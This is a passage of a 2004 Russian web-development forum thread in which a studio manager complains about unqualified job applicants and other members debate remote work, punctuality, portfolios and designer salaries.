Xpoint
   [напомнить пароль]

Обсуждение проблемы квалифицированных специалистов

Метки: управление персоналом, поиск
2004-05-26 10:59:43 [обр] Федченко Алексей[досье]

Не знаю насчет соответствия поднятой темы данному разделу, но где еще можно обсудить проблему, как не здесь. В течение 3 месяцев ищу работников для студии дизайна. На собеседования пришло около 100 человек. Должности: веб-дизайнер, программист, верстальщик.

Проблема первая - низкий уровень претендентов. Общеизвестная фишка - человек увидел ЭВМ, купил библию фотошопа, прочитал первые 30 страниц и начал рассылать резюме на вакансии дизайнера. О необходимости портфолио и не слышал. Далее следуют те, у кого есть "портфолио" (именно в кавычках). Каких кошмаров я только не насмотрелся. Могу написать лучшую в мире книгу "1 000 000 ошибок в веб-дизайне на реальных примерах". Но стоит мягко намекнуть автору "портфолио" о несоответствии уровня его работ запрашиваемой зарплате, сразу получаешь ответ в стиле "сам %$##$#@@#". Эта проблема относится к веб-дизайнерам.

С программистами по уровню знаний в конкретных языках и приложениях проблем не было, но я столкнулся с невозможностью дальнейшего развития претендента и с нежеланием выполнять внутренние корпоративные правила.

Верстальщик, слава богу, пока работает. Потому что есть желание.

Это другая проблема. Спрашиваю всех, кто ищет или собирается искать работу - вы правда думаете, что на вопрос "Собираетесь ли вы у нас работать постоянно?" можно ответить "Нууууу, не знаааюююю...". После этого я обычно заканчиваю интервью. Зачем тратить мое и ваше время. Сейчас теплая солнечная весна, можно хорошо отдохнуть. Но приходя на собеседование, лучше сразу определиться, так просто вы зашли или поработать.

Последняя важная проблема. Я очень спокойный человек. Но когда в 10-ый раз за день я слышу фразу "Я готов(а) работать УДАЛЕННО", то очень хочется выстрелить в собеседника в упор. Во всех своих объявлениях о приеме на работу я указываю, что нам нужны ПОСТОЯННЫЕ сотрудники. Приходят на первый взгляд вменяемые люди и пытаются в конце разговора, когда практически обо всем договорились, раскрутить меня на контрактную работу.

Давайте, соискатели. Подумайте и ответьте, как самому себе, хотите ли вы работать?

Зачем это написано? Я все-таки надеюсь, что есть люди, желающие иметь постоянную работу и стабильную высокую заработную плату. Я готов платить дизайнеру до $1500, но при выполнении им планов, которые с ним же обсуждаются. Пока я не видел дизайнеров, соответствующих данному уровню зарплаты. Реальный уровень работ претендентов - $200-$300 в месяц МАКСИМУМ. А те, кто реально стоят $500, просят $2000-$3000.

После прочтения и усваивания этого постинга звоните мне 730-77-56, если считаете, что соответствуете требованиям, и будем договариваться о собеседовании.

спустя 1 час 34 минуты [обр] Андрей Новиков(5/1242)[досье]
М Хм, если это такое завуалированное приглашение на работу, то форум верный и начинать дискуссию не стоит. Но если Вы все-таки хотите подискутировать на данную тему, то я ее перенесу в Аспекты разработки::Персонал.
спустя 4 минуты [обр] Федченко Алексей[досье]
Это прямое приглашение на работу. Но подискутировать не откажусь. Поступайте, как считаете нужным.
спустя 2 часа 42 минуты [обр] Надя Строганкова(0/17)[досье]
3 месяца - не очень большой срок.
А потом, кроме уровня зарплаты, людей может интересовать уровень задач. Мне, как профессионалу, было бы неинтересно и неприятно делать "за те же деньги", но менее интересную работу. И наоборот. Я готова на меньшие деньги, ради интересной работы.
спустя 13 минут [обр] Федченко Алексей[досье]

У нас есть любые заказы. Начиная от "сделайте мне розовую полосу из угла в угол, а я посмотрю" до "дизайн на ваше усмотрение".

Интересная работа разными людьми трактуется по-разному.

Для кого-то 3 месяца не очень большой срок, а для меня 3 крупных повисших проекта - это много. Причем ничего сверхъестественного в дизайне я не требую.

Надя, вы заявляете о собственном профессионализме. Могли бы вы показать уровень своего профессионализма ссылкой на портфолио, которую вы опубликуете здесь? А я субъективно оценю его. И другие тоже. Другие нужны, чтобы сравнить уровень требований.

спустя 29 минут [обр] Надя Строганкова(0/17)[досье]
Извиняюсь, что не уточнила. Я не дизайнер, а верстальщик. Мой пост можно расматривать только в рамках дисскусии.
спустя 6 минут [обр] Андрей Новиков(5/1242)[досье]
Ну если в рамках дискуссии, то замечу, что это только считается, что ИТ-специалистов масса. Хорошего специалиста днем с огнем не сыскать. В вашем случае можно было бы первый контакт с претендентом осуществлять удаленно — 98% мусора отсеялось бы сразу. Замечу также, что действительно ценные кадры, как и всё остальное впрочем, находятся по знакомству. С улицы редко такие люди приходят, хотя конечно бывает.
спустя 5 минут [обр] Федченко Алексей[досье]

А верстальщиков мои вопросы тоже касаются. Мое мнение, что за $500, которые, как минимум, запрашивают верстальщики на собеседовании, они должны знать и уметь корректно применять CSS. В 90% я слышу вопрос "а что это?", в 5% претенденты путают CSS и SSI, 5 оставшихся процентов все-таки знают эту технологию.

Все-таки попрошу посетителей данного форума ответить на вопрос, насколько серъезно они готовы относиться к постоянной работе? Или здесь находятся сплошные рекрутеры вроде меня? Ситуация напоминает мне бум IT-профессий в Силиконовой Долине - вакансий море, работников нет.

Андрею Новикову: по поводу первого контакта - мне не трудно принять человека лично. От первого визита складывается определенное впечатление, которое потом только подтверждается. На этой неделе я не нашел ни одну кандидатуру, чтобы даже пригласить их на собеседование. В job.ru одни и те же на протяжении 3 месяцев.

По знакомству не получается - мои знакомые, как и знакомые наших сотрудников из группы компаний работают в других сферах.

спустя 1 час 3 минуты [обр] Dag+(0/43)[досье]
сообщение промодерировано

Веб-дизайнер, программист, верстальщик — это как раз такой профиль который лучше будет работать у себя дома, в привычном для себя окружение чем в офисе. И эффективность будет выше и человек сэкономит пару часов на дорогу. Если Вы сумеете договорится что работу они должны воспринимать как настающую и у вас наладиться качественна онлайн связь, тогда проблем не вижу. Вам нужен результат а не скучная офисная тусовка.

Портфолио также не нужен. Как и диплом. Лучше придумайте парочку тестовых заданий для каждой позиции.

Спрашиваю всех ... "Собираетесь ли вы у нас работать постоянно?"

Ну и вопрос... ответ на него Вам ничего не дает. Любое решение принимается в течение первых 5 минуть с момента встречи и все тут. И у Вас, на самом деле задача не так сложная... Вам нужны конкретные веши... легко измеряемые... "работником на дому" может работать и очень хороший специалист который по другим параметрам не совместим с Вами лично (энергетика у вас разная; он много курит, Вы нет и т. п.).

А работа дизайнера настолько боле важна чем все остальное? Я не уверен что так должно быть... или рынок труда такой?

спустя 15 минут [обр] Дмитрий Попов(0/509)[досье]
программист, верстальщик — это как раз такой профиль который лучше будет работать у себя дома, в привычном для себя окружение чем в офисе

??????? Ужас.

Про эффективность я вообще молчу.

Портфолио также не нужен. Как и диплом.

Так считают все, у кого маленький опыт работы.
У меня нет диплома, но я считаю, что он нужен.
А про портфолио вообще молчу.

В 90% я слышу вопрос "а что это?", в 5% претенденты путают CSS и SSI, 5 оставшихся процентов все-таки знают эту технологию.

Значит одно из двух: Или Вы не умеете составлять текст вакансии, или предлагаете такие деньги.

спустя 10 минут [обр] Федченко Алексей[досье]

При нашем темпе работы я не смогу эффективно управлять удаленными работниками. Это раз. Второе - я прекрасно знаю, что такое работа дома, так как 4 года пытался это делать. Ничего хорошего не получилось. Договориться о восприятии работы всеръез... Мне трудно договориться о восприятии работы в офисе всеръез, а уж дома... Все принятые на работу клянутся, что будут работать не покладая рук от рассвета до упора, а через неделю-две начинается. Опоздания на 2 минуты с извинениями, на 10 без извинений, на час с предварительным звонком, на 3 часа без предупреждения и по нарастающей.

Я не разделяю работников на дизайнеров/верстальщиков/программистов и остальных. Для всех действуют единые правила работы и не стоит требовать для себя исключительного статуса. Как было с дизайнером, которому разрешили приходить на полчаса позже. Мне с трудом удалось пробить это разрешение у вышестоящего начальства, а через месяц работы полчаса превратились в час и т.д.

С удаленщиками мы уже поработали. Опять очень трудно сдерживать эмоции, но люди с неплохим портфолио начинают слать такую #$##%%# и на критику отвечать, что мы ничего не понимаем в дизайне/программировании/верстке.

Работа дизайнера более важна именно для моей компании именно на данном этапе, рынок тут ни при чем. Просто провисли проекты. Маразм - проектов куча, работать некому. А у удаленщиков один проект в 1-3 месяца, но гордость (и лень?) не позволяет им пойти на постоянную работу.

По поводу эффективности - я не могу каждому сотруднику домой кинуть двухмегабитный канал, дизайнерам выдать мониторы Iiyama, планшеты Wacom Intuos II и т.д., а в офисе это все есть, и будем приобретать все, что нужно для работы. Да я бы 10 лет назад только за радость поработать на таком оборудовании пошел на минимальную зарплату.

А по портфолио я как раз фильтрую людей. Часто бывает так - резюме идеальное, 8 высших образований, из которых 11 - по профилю веб-дизайна, рекомендации от Microsoft и Правительства Москвы, а в портфолио находятся работы из шаблонов FrontPage, да еще и подпорченные (если там еще можно что-то подпортить).

спустя 2 минуты [обр] Федченко Алексей[досье]
Дмитрию Попову: текст вакансии я сократил до минимума, а зарплата верстальщика у нас - $400-$500. Я считаю, что это очень достойная зарплата для данной специальности. Ваши мнения?
спустя 19 минут [обр] Надя Строганкова(0/17)[досье]
На этом форуме уже поднимался вопрос дисциплины сотрудников. :))
По поводу несоответствия знаний и запросов - либо вы сильно преувеличиваете, либо, сейчас эти специалисты столько стоят.
А вообще 100 собеедований за 3 месяца - сколько же вы времени своего и чужого впустую потратили. Уму непостижимо.
А что вы хотите от верстальщика за эти деньги и что вы за фирма - ваше портфолио можно посмотреть?
З.Ы. Ни за что не пошла бы работать в контору, где косо смотрят на опоздания на 30 минут без звонка или на большее время со звонком. Я не в армии служу :)
спустя 10 минут [обр] Федченко Алексей[досье]

>>А вообще 100 собеедований за 3 месяца - сколько же вы времени своего и чужого впустую потратили.

У меня работа такая - я руководитель проекта.

>>А что вы хотите от верстальщика за эти деньги и что вы за фирма - ваше портфолио можно посмотреть?

Не знаю, можно ли здесь размещать название фирмы, но если нельзя, модератор удалит. www.vpechatlenie.ru
Бледное портфолио и есть результат (то есть отсутствие результата).

>>З.Ы. Ни за что не пошла бы работать в контору, где косо смотрят на опоздания на 30 минут без звонка или на большее >>время со звонком. Я не в армии служу :)
Это я слышу и читаю каждый день несколько раз. А клиенту все равно, где болтается сотрудник, из-за которого он в 9.40 не может решить вопрос. А клиенты в разработке у нас солидные. И лично я устаю постоянно сохранять лицо студии и врать клиенту, что ответственный сотрудник заболел/в пробке/у другого клиента.

>>По поводу несоответствия знаний и запросов - либо вы сильно преувеличиваете, либо, сейчас эти специалисты столько >>стоят.
Я боюсь выглядеть самоуверенным, но хочется самому определять уровень зарплаты работников, исходя из ситуации на рынке, возможностей студии и количества заказов. А не идти на поводу сотрудника, который говорит "платите мне 20000 рублей за то, что я классный пацан" (к счастью, этот сотрудник образумился).

P.S. Надя, вы постепенно скатываетесь на провокационные высказывания. Это не нужно ни вам, ни мне.

спустя 13 минут [обр] Дмитрий Попов(0/509)[досье]
А клиенту все равно, где болтается сотрудник, из-за которого он в 9.40 не может решить вопрос. А клиенты в разработке у нас солидные. И лично я устаю постоянно сохранять лицо студии и врать клиенту, что ответственный сотрудник заболел/в пробке/у другого клиента.

А вот это говорит об уровне работы с клиентами.

В конторе, в которой я работаю сейчас - клиенты тоже солидные. Очень солидные.

Но если в 9:40 им приспичило сделать что-то в ближайшие пять минут, то он вежливо переубеждается и отсылается на завтра. Что вполне логично и оправданно.
И у программистов и у дизайнеров свободный график, что тоже логично. Ибо человек (нормальный человек) гораздо лучшую отдачу дает тогда, когда работает согласно собственному распорядку дня. И если он сова - то почему он не может работать по ночам? А если жаворонок - то пусть приходит хоть в шесть утра.

Единственный человек, который должен быть от звонка до звонка - мендежер, руководитель проекта. Ибо в его задачу, в первую очередь, и входит разруливать ситуации. и ждать звонка клиента в 9:40.

З.Ы. Вот я сегодня на работу пришол в 15:00. Вчера я предупредил - что хочу сегодня поспать. Я выспался, и полный сил сделал за 1 час то, что вчера не мог сделать за 4 часа работы, встав в 8 утра из-за необходимости ехать в универ. И что в этом плохого?

спустя 10 минут [обр] Александр Самойлов(1/342)[досье]

Согласие - продукт непротивления сторон, поэтому если человек просит 2000, а на ваш взгляд стоит 500, ну что ж, есть много чего, что кажется не стоит своих денег.

Странный вопрос "Собираетесь ли вы у нас работать постоянно?".
Понятно, что всю жизнь работник работать у вас не будет.
Также понятно, что работа в течении пары дней не есть постоянная.
Но точно также не понятно, где для вас и где для работника проходит та грань, которая разделяет постоянную и непостоянную работу.

Естественно соискатели теряются, вы же не сообщили им эту информацию.
Поэтому лучше спросить на какой срок соискатель готов заключить контракт.

Не понятно желание расстрелять всего лишь за фразу "Я готов(а) работать УДАЛЕННО".
Не нужно искать что-то между строк. Человек сказал, что ГОТОВ работать, т.е. если у вас появится желание, то с его стороны проблем не будет

спустя 1 минуту [обр] Федченко Алексей[досье]

Дмитрий, я не смогу вам аргументированно ответить, так как вы выступаете с позиции "все будет по-моему" и ваши менеджеры идут у вас на поводу. Это их проблема.

>>Но если в 9:40 им приспичило сделать что-то в ближайшие пять минут, то он вежливо переубеждается и отсылается на >>завтра. Что вполне логично и оправданно.
Этот принцип называется "зачем делать завтра то, что можно отложить на послезавтра". Я это не приветствую.

Все остальное в вашем постинге - оправдание нежелания работать.

Но я рад, что наконец-то начали поститься те, из-за которых я завел дискуссию. Пусть ваше мнение посмотрят и оценят окружающие. Вас из-за возраста явно не переубедить, я и не преследую такой цели. Прошу без обид. Я сам 10 лет назад придумывал такие отмазки, чтобы не работать, но надувать щеки...

спустя 3 минуты [обр] Федченко Алексей[досье]

Александру Самойлову: постоянно - значит он завершит проекты за которые возьмется - это просто. По поводу удаленной работы: мы обо всем договорились с претендентом, на следующий день он звонит и говорит, что ему удобнее работать из дома и он подойдет за авансом в конце недели. Как мне поступать в таком случае?

Все мои требования проистекают из реальных случаев на нашем предприятии. Нет цели кого-то застроить. Кто работает - тот спокойно работает.

спустя 18 минут [обр] Роман aka light(0/20)[досье]
Федченко Алексей[досье] У меня есть друг
очень хороший хуждожник-дизайнер с большим стажем
позвонить пока не смогу не могли бы написать
ваши требования мне на е-мейл (он есть в профиле), вилку по зарплате
и я Вам свяжусь с ним и отвечу Вам
спустя 7 минут [обр] Александр Самойлов(1/342)[досье]

Федченко Алексей[досье]
Так и надо спрашивать. Хотя новому человеку, опять же, неизвестно, какие у вас проекты и их длительность, все-таки, на мой взгляд, указание временных рамок предпочтительнее.

И, все-таки, готовность работать удаленно и требование работать удаленно это разные вещи.
И далеко не всякий, кто задекларировал готовность к удаленной работе, будет требовать предоставить ему эту возможность.

Что касается перехода готовности в требование, то тут надо решать, в зависимости от правил работы компании и было ли это предусмотрено в контракте.

Так или иначе, если человек заявляет о своей готовности работать удаленно, это является возможностью четко изложить касающиеся этого момента внутрифирменные правила, указать на недопустимость удаленной работы, по крайней мере на время испытательного срока и т.д.

спустя 8 минут [обр] Сергей Сирик(8/737)[досье]

100 человек за три месяца, на три вакансии??? Это мало ...

Алексей, минимальный текст вакансии - тоже не всегда хорошо :) Хороший текст с пачкой требований просто отпугнет людей без уверенности в своих знаниях. А знания без уверенности в них - не есть хорошо.

Надя Строганкова[досье] Дорастете до руководителя - будет очень-очень хотется, чтоб за вас более крупное начальство косо смотрело на ваших подчиненных, опаздывающих хоть со звонком, хоть без.

Наше руководство считает, что одни пропущенный сотрудником час эквивалентен трем пропущенным часам - потому как рикошетом задеваются и остальные сотрудники в команде.

Дмитрий Попов[досье] К кому быстрей пойдет заказчик, к компании, способной решать любой вопрос в 9:40 или к умеющей разрулить?? А плохого в этом то, что задача должна была быть сделана вчера!!!

спустя 48 секунд [обр] Федченко Алексей[досье]

Александр, наше с вами обсуждение ушло в детали, о которых можно говорить бесконечно. Все то, о чем вы пишете, проговаривается если не на собеседовании, то в первый рабочий день испытательного срока. Внтурифирменные правила даются на бумажке на собеседовании, если стороны пришли хоть к какому-то согласию.

Многие пугаются банальных вещей - например, того, что у нас работа на результат, а не на посидеть в интернете. Но поверьте, требования у нас разумные и ничего такого, о чем пишут на сайте http://herovajob.boom.ru, у нас и близко нет.

спустя 1 минуту [обр] Федченко Алексей[досье]
Спасибо, Сергей, за поддержку, а то я думал, что все придерживаются мнения, что полный рабочий день - это дурной тон.
спустя 16 минут [обр] Роман aka light(0/20)[досье]
Федченко Алексей[досье] или стучитеть в icq nick name - Yaiu я там такой один :)
спустя 16 минут [обр] Дмитрий Попов(0/509)[досье]

Сергей Сирик[досье]

1. К компании, которая делает все так, что не возникает вещей, которые должны быть сделаны вчера.
  2. А я же говорю про другую ситуацию - когда клиенту сдают сайт, вечером на мыло выслали сообщение с адресом, где он может его тестировать. И он каждый день начинает слать сообщения, что "Здесь плохо, там галочку поставить. Срочно!". Такие ситуации НЕ ДОЛЖНЫ решаться сразу. Менеджер должен выяснить у закачика список того, чего конкретно он хочет переделать - и программист/верстальщик должен сделать это одни разом и массово.

Иначе получится бред - постоянные исправления, отрывание от других проектов и выбивание из всего рабочего дня.
Но это - уже, согласитесь, выходит за рамки темы - работа с сотрудниками а не клиентами.

Федченко Алексей[досье]

Этот принцип называется "зачем делать завтра то, что можно отложить на послезавтра". Я это не приветствую.

А, понял... Вы приветствуете выполнение сиюминутных прихотей клиента в ущерб общему процессу производства?

Но я рад, что наконец-то начали поститься те, из-за которых я завел дискуссию. Пусть ваше мнение посмотрят и оценят окружающие. Вас из-за возраста явно не переубедить, я и не преследую такой цели. Прошу без обид. Я сам 10 лет назад придумывал такие отмазки, чтобы не работать, но надувать щеки...

А вот это хамство. Полное. Которое, кстати, запрещено правилами форума.

Мне казалось что Вы хотели дискуссию, а не просмотра мнений. Во втором случае я не писал бы сообщения.
Пузами будем меряться? Вот фирма в которой я работаю, имеет достаточный опыт, что бы понять - как должны работать сотрудники, и имеет в портфолио далеко не 4 сайтика. И почему-то здесь руководители решили, что такой режим работы лучше.
Так почему Вы считаете что Вы более правы???

Я бы все-таки попросил Вас вести нормальную дискуссию с нормальными аргументами, а не голые высказывания.

спустя 11 минут [обр] Федченко Алексей[досье]
Дмитрию Попову: извините, если увидели в моих словах хамство. В мыслях не было.
спустя 7 минут [обр] Дмитрий Попов(0/509)[досье]

Мда... Интересно, Вы мнение персонала так же слушаете? И так отвечаете?

Учитвая, что в фирмах такого плана он весь, как правило молодой...

спустя 4 минуты [обр] Dag+(0/43)[досье]

Алексей, вы достаточно понятно ответили на мой постинг и теперь, прочитав все следующее что Вы написали, мне ваша позиция стала боле понятной. Она сильно отличается от того как Вы начали (ре: мол, есть работа но никто работать не хочет а тот кто хочет — не умеет... что за бред работать дома... и все в этом смысле.). Так что: не только Сергей во многом согласен с Вами: меня тоже туда зачислите:)) Конечно, не во всем...

Работа веб-дизайнеров (программистов, верстальщиков...) креативная и ее результат четко видан так что по своей специфике (специфики самой работы, не человека) она идеально подходит под термин "удаленно работать" и Ваш плохой опыт не доказывает обратно. Есть люди которые совместно делают большие веб-проекты а один из них в Канады, второй в Англии и т. п. и ничего. Так что... все до человека: безответственное (или юное) создание — оно и на работы таковым будет а работа управленца не что бы ходить с палкой и заставлять людей (лучше) работать а что бы создавать условие и умет выбирать компании подходящий персонал.

Если Вам удастся найти хорошего сотрудника, Вам когда ни будь придется изменит политику в своей фирме. Творческий человек должен сделать то что с него спрашивают а когда он это будет делать и как: это его проблема. Ваш пример звонка в 9:40: у Вас должен быть человек типа front-man или Project Responsible Manager и все вопросы любого клиента (кем бы он не был) должны быть направлены только ему. Зачем клиенту общаться с Вашим дизайнером (программистом, уборщицей...)? Армейская дисциплина за творческого человека неприемлемая. А выбор всегда за Вами. Честно говоря мне с трудом вериться что за USD1,500 невозможно найти нормального дизайнера.

Вот это понравилось (у меня похоже опыт:)):
http://www.bekasov.ru/shen/design.htm

спустя 24 минуты [обр] Федченко Алексей[досье]

>>Если Вам удастся найти хорошего сотрудника, Вам когда ни будь придется изменит политику
>>в своей фирме.
Не знаю, я придерживаюсь мнения, что грош цена той фирме, которая подстраивается под одного(!) специалиста. Как правильно написал один из участников обсуждения, страдает весь коллектив и проекты.

>>Работа веб-дизайнеров (программистов, верстальщиков...) креативная и ее
>>результат четко видан так что по своей специфике (специфики самой работы,
>>не человека) она идеально подходит под термин "удаленно работать" и Ваш плохой
>>опыт не доказывает обратно. Есть люди которые совместно делают большие веб-проекты
>>а один из них в Канады, второй в Англии и т. п. и ничего.
Хотелось бы в данном случае услышать мнение зубров рынка, выпускающих веб-сайты потоком. Они сюда заходят?
У нас есть возможность получать 20 заказов на веб-сайты в месяц и нереально гнать конвейер с людьми в удаленном режиме работы. В этом меня никто не переубедит.

спустя 3 часа 8 минут [обр] Dag+(0/43)[досье]
Как правильно написал один из участников обсуждения, страдает весь коллектив и проекты.

Грош цена той фирме которая от этого страдает.

Специалист, он и есть специалист. У него знания (таланты) нужны Вам и которым Вы не владеете. Вы с начала почувствуйте разницу между "подстраивается под одного специалиста" и "идти на разумные уступки" или "понимать что такое Специалист". На данный момент, на Вашем веб-сайте недобросовестная реклама типа "делаем все в сроках" а дизайнера у Вас нет. И не будет. Если бы Вы когда либо изучали HRM, Вы бы лучше понимали всю проблему. Хороший дизайнер завтра уйдет от Вас и на меньшую зарплату если отношение к нему будет боле уважительным. А у Вас, уж простите, какая-то позиция Бога. Наверно Вы думаете что деньги самое важное в этом мире.

мнение зубров рынка, выпускающих веб-сайты потоком. Они сюда заходят?

Странное словечко: потоком. Нет, они сюда не заходят. Но может быть Вам это поможет:

начало рабочего дня — не позже 12:00;
http://www.artlebedev.ru/studio/vacancy/

А тут и четкое описание вакансии:
http://www.artlebedev.ru/studio/vacancy/super_coder_2/

спустя 44 минуты [обр] Дмитрий Попов(0/509)[досье]
У нас есть возможность получать 20 заказов на веб-сайты в месяц и нереально гнать конвейер с людьми в удаленном режиме работы.

Во! Вот с этого и надо было начинать!
Вы гоните потоком, ставя людей на конвеер. И делаете сайты за 500 баксов. Пожалуйста - работайте. Только помните - эта ниша, на которой сотни, тысячи других компаний. И ниша эта себя изживет.

Студия Лебедева имеет песонал больше полусотни человек, при том, не занимается программированием, и выпускает около 15 заказов в месяц. Среди которых, максимум десяток сложных и крупных.

У вас хотя бы 20 человек в студии есть?

З.Ы. Хотел про свою работу, но остановился...

спустя 10 минут [обр] Сергей Сирик(8/737)[досье]

Dag[досье]
Почитайте чуть выше - предупредить о своем уходе ЗА ДВА МЕСЯЦА!!! Люди с таким уровнем ответственности будут приходить на работу в любое обусловленное время. Приведеный же Дмитрием выше пример в лице себя - это приход в весьма разнообразный промежуток времени ... И "ничего не мог сделать, потому что в 8 проснулся" не оттого ли, что до позней ночи вечером колбасил что-то, придя на работу в 15??

Про "страдания фирмы". Если фирма страдать не будет, будут страдать клиенты. Рано или поздно они это поймуть ... Отсутствие сотрудника на рабочем месте в 9:00 - не такая уж и сверхестественная ситуация - люди болею, влюбляются, попадают в КПЗ, сидят в пробках и т.д. И при наличии организации как понятия в фирме она с этим справится - удовлетворит клиента. Страдает именно фирма, а коллектив получает денежку за овертаймы по нивелированию влияния прекрасных глаз незнакомки :)

Дмитрий Попов[досье]
При тестировании "срочно!!!" от клиента - действительно глупость ... тестирование - это не коммерческая эксплуатация, когда из-за неправильной реакции программы на отметку чекбокса теряются деньги заказчика ... или 150 человек улетят не в Испанию, а в Гренландию.

Да, а в поточном производстве сайтов очень много креативности. Алексей, попробуйте рассказывать об этом аппликантам :)

спустя 5 минут [обр] Дмитрий Попов(0/509)[досье]
Сергей Сирик[досье]
Вот именно, что при тестировании.
Если у заказчика чего-то не работает физически - то он знает мобильник его мендежера (мобильник оплачивается фирмой. И менеджер обязан его всегда иметь при себе). И он звонит менеджеру, хоть в 12 ночи. А менеджер звонит мне, и я хоть в 3 хоть в 7 утра бегу исправлять проблему. И это уже нормально.
спустя 4 минуты [обр] Дмитрий Попов(0/509)[досье]

И еще, кстати:

"Собираетесь ли вы у нас работать постоянно?" можно ответить "Нууууу, не знаааюююю...".

А Вы по другому спросите:
Вы ищете постоянную работу?

А на первый вопрос мало кто ответит. Ибо,

1. когда человек ищет работу верстальщиком в Москве за 500 баксов для него есть много других

определяющих моментов. В том числе - какой коллектив, как работается, какое отношение
 начальства к подчиненным, бывают ли премии и т.д.
 И гораздо хуже, если ответ будет "Да, конечно. Именно у Вас я хочу работать постоянно"

1. Не забывайте, что человек редко идет на первую попвшуюся работу. И честно отвечая, что он не знает - будет ли он у Вас работать постоянно - он просто честно отвечает на Ваш вопрос. Может у Вас там тирания и штрафы?
спустя 9 часов [обр] Федченко Алексей[досье]

Мне нечего ответить на все обвинения. Да, я тиран и садист, ем маленьких детей и насилую старушек. У вас, похоже, создалось такое впечатление. Но с помощью этой дискуссии я получил резюме 3 дизайнеров и 2 программистов с реальными требованиями и неплохим опытом работы. Заметьте, они не писали сюда обличительные речи, а просто послали резюме. С одним неплохим дизайнером в 9 утра я уже провел собеседование. Так что увидимся через месяца 2, когда наш сайт будет выглядеть более достойно и портфолио будет более полным. А режим и распорядок работы у нас будет прежним.

Так что если кто еще желает ПОРАБОТАТЬ, а не поиздеваться, просто присылайте резюме на адрес alexei@number.ru или звоните 730-7756.

спустя 2 часа 40 минут [обр] Антон Гусев(0/19)[досье]
Федченко Алексей[досье], вы - человек не на своем месте. От этого все проблемы.
спустя 37 минут [обр] Антон Гусев(0/19)[досье]

Здравствуйте, Антон,

Меня выбрали из многих претендентов. А я не задумывался, на своем я
месте или нет. Это покажет время и успешность/неуспешность развития
студии.

Но, положа руку на сердце, должен сказать, что не вам судить о моей
профпригодности и тем более размещать такие фразы во всеобщее
обозрение.

В данном постинге я всего-лишь пытался выяснить, почему претенденты
требуют в 2-3 раза больших денег, чем реально стоят, а дождался
обвинений во всем, чем можно, и это еще точно не конец.

Да и проблем то особых нет. Просто рабочие моменты, которые я решаю в
рабочем порядке.

С уважением,
Алексей В. Федченко

Алексей,

Вы восприняли мои слова со знаком минус, хотя, как мне кажется, повода для этого нет. Видимо сказалось общее настроение дискуссии, хотя вы ее участник и должны нести за это определенную ответственность. Впрочем, это предмет для отдельных рассуждений.

Общий смысл моей фразы - не должен руководитель проекта заниматься первоначальным отсевом претендентов. Для этого есть другие люди, скажем так, "менее ценные" для вашей организации. Или вообще отдайте этот вопрос на откуп в рекрутинговую контору.

Не царское это дело. :)

З.Ы. Позволю себе продублировать данный ответ на форуме.

С надеждой на понимание,
Антон

спустя 5 минут [обр] Федченко Алексей[досье]

Да, я не понял вас, извините. Но больше некому отбирать претендентов -
у нас не такая большая компания. Да и лучше я сам подберу себе
ответственных сотрудников, с которыми сработаюсь и буду выдавать
качественный продукт.

Печальный опыт работы с рекрутинговыми конторами имеется - присылают
тех же, что мы уже интервьюировали, но за наши деньги.

спустя 9 минут [обр] Артём Сапронов aka Capricorn(0/569)[досье]
Федченко Алексей[досье]
Я не верстальщик, я админ. Это немного другое, но все же если у нас все работает, то работает, если нет мы сидим ночами. И вот когда я слышу от начальства что за опаздание на 15 минут меня оштрафуют на сумму равноценную оплате за 2а дня, мне хочется тут же написать заявление если не на увольнение, то на больничный на эти 2 дня. Почему я должен работать просто так? и это при том что никто не доплачивает за ночные и сверхурочные. Мы понимаем что работа должна быть сделана к утру (к понедельнику) и мы хотим чтобы понимали нас. Я с завистью смотрю на вакансии Лебедева и Яндекса, пусть дешевле, зато по человечески относятся
спустя 18 минут [обр] Федченко Алексей[досье]

Мне не хочется, чтобы мои сотрудники сидели ночами. Моя мечта - чтобы все уходили домой в 18.00, но, выполнив планы на день.

И если человек опаздывает на 15-30 минут из-за пробки, то никто его наказывать не собирается.

спустя 2 часа 52 минуты [обр] Dag+(0/43)[досье]
Почитайте чуть выше - предупредить о своем уходе ЗА ДВА МЕСЯЦА!!!

Сергей, но это же такая глупость... Я это и не видел и Лебедев не мое самое любимое чтение тем более авторитет... здесь не идет речь о дизайне а о других науках и качеству работы мозгов. Подумайте: откуда у Вас право предъявлять человеку с которым у Вас никаких отношений нет, такие требования? Потенциальный сотрудник или подходить или нет. Если да и если он занят, тогда Вы его берете (твердо) и говорите: "Предупредите свою бывшую фирму и поработайте у них еще два месяца." И только так. По ГЗОТу - один месяц и зачем придумывать колесо? Что бы другие о вас хорошо думали? Уж на это Вы никак повлиять не можете а и не надо.

Четкий выбор: у Вас два дизайнера: один экстра класса и его веб-проекты смотрятся шикарно и вызывают повышенный интерес но он "с характером" и второй, просто "хороший" дизайнер и нормальный парен (девушка). Ваши действия? Попытаетесь договориться с первым или возьмете второго? Ваш продукт, имхо, как веб-дизайнерской студии, это то что Вы сделали (портфолио) и это единственно что потенциальный клиент увидит. Все остальное... клиента не интересует.

Если фирма "страдает" от чего либо, значит что-то в ней не так и грамотно организованная фирма никогда не должна страдать из-за одного человека. К слову: я последних 12 лет работал исключительно управленцем и были случаи: подходить сотрудник и говорить: "Я работаю еще месяц и ухожу." на что всегда получал только один ответь: "Хорошо подумали? Может быт передумаете?" "Нет. Я решил(а)." "Тогда, пожалуйста в бухгалтерию, получите зарплату за следующий месяц, сдайте дела и с завтрашнего дня не приходите больше. Вы должны быть доступны по телефону в течение одного месяца." Это не рецепт... просто такой подход к уходящему.

Мне нечего ответить на все обвинения. Да, я тиран и садист, ем маленьких детей

Смешно и по детски. Вы же сами сказали что открыты за дискуссию...

Так что если кто еще желает ПОРАБОТАТЬ, а не поиздеваться

Так людей на работу не приглашают.

спустя 1 час 3 минуты [обр] Сергей Сирик(8/737)[досье]
Dag[досье]
Это я к тому, что не надо вырывать из контекста одну цитату ... там есть другие, которые во многом нивелируют ее "мощность" в вырванном виде. А предъявлять требования к потенциальным сотрудникам я могу какие угодно ... И уговаривать до потери пульса изъявившего желание уйти остаться - тоже. Выяснять, почему хочет уйти и помочь решить проблему, если это в моих силах.
спустя 10 минут [обр] Антон Гусев(0/19)[досье]
Dag[досье] Не знаю про ГЗОТ, не знаю про РФ ли речь, но по КЗОТу РФ - две недели:

Статья 80. Расторжение трудового договора
               по инициативе работника (по собственному
                               желанию)

Работник имеет право расторгнуть трудовой договор, предупредив об
этом работодателя в письменной форме за две недели.
     По соглашению между работником и работодателем трудовой договор
может быть расторгнут и до истечения срока предупреждения об
увольнении.
     В случаях, когда заявление работника об увольнении по его
инициативе (по собственному желанию) обусловлено невозможностью
